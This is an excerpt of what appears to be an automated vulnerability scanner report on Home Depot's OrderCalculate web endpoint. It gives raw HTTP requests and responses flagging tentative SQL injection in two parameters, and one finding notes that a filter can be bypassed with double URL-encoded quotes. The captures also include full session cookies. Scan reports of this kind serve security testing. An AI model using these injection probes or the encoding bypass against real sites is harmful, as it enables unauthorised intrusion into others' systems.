Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22134%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24188%2c466%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310817103%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225096227%3a%3bC25%5fEXP%3d1360065096%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:43 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228703137%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cz%2f1Hpvzia3yZ7tqr69NFZ9CbZjI%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc%00''&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:51:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:51:48 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308225108198%3a%3bC25%5fEXP%3d1360065108%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:51:48 GMT;Path=/


1.69. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [check parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The check parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the check parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the check request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n%2527&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:40:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:40:53 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:48 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:49 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%2240%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%2456%2c960%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816449%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224448271%3a%3bC25%5fEXP%3d1360064448%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:49 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228049079%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cULS6xF8iE3rEwtnNl%2ftRk6wz%2fa8%3d;Domain=.homedepot.com;Path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...
<!-- Stores\Web Content\GenericError.jsp -->
...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n%2527%2527&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:40:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:40:54 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224454064%3a%3bC25%5fEXP%3d1360064454%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:40:54 GMT;Path=/


1.70. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [jspStoreDir parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.homedepot.com
Path:   /webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The jspStoreDir parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the jspStoreDir parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus'&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
